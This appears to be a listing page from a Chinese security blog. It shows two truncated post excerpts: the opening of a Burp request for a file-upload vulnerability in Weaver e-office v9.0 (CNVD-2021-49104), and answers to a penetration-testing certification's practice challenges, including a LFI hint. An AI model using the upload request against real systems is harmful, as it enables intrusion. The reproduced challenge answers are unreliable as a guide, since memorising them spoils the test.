泛微 e-office v9.0 文件上传漏洞(CNVD-2021-49104)

2021-11-27 / 0 评论 / 688 浏览 / Mrxn

影响版本:泛微 e-office v9.0  burp 发包: POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: 127.0.0.1:7899 User-Agent: Mozilla/5.0...

谷安学院CISP-PTS渗透测试专家认证-预报名测试题目解答

2021-11-15 / 0 评论 / 967 浏览 / Mrxn

第一题: 直接 POST :http://103.66.216.51:9997/index.php?a=1 POST数据:b=2 即可拿到 key1:T0kS7r3c 第二题: 简单的代码审计,经典的 LFI ,做了简单的限制,不能用 php:// 伪协议,最简单的就是用其他伪协议代替 <?php show_...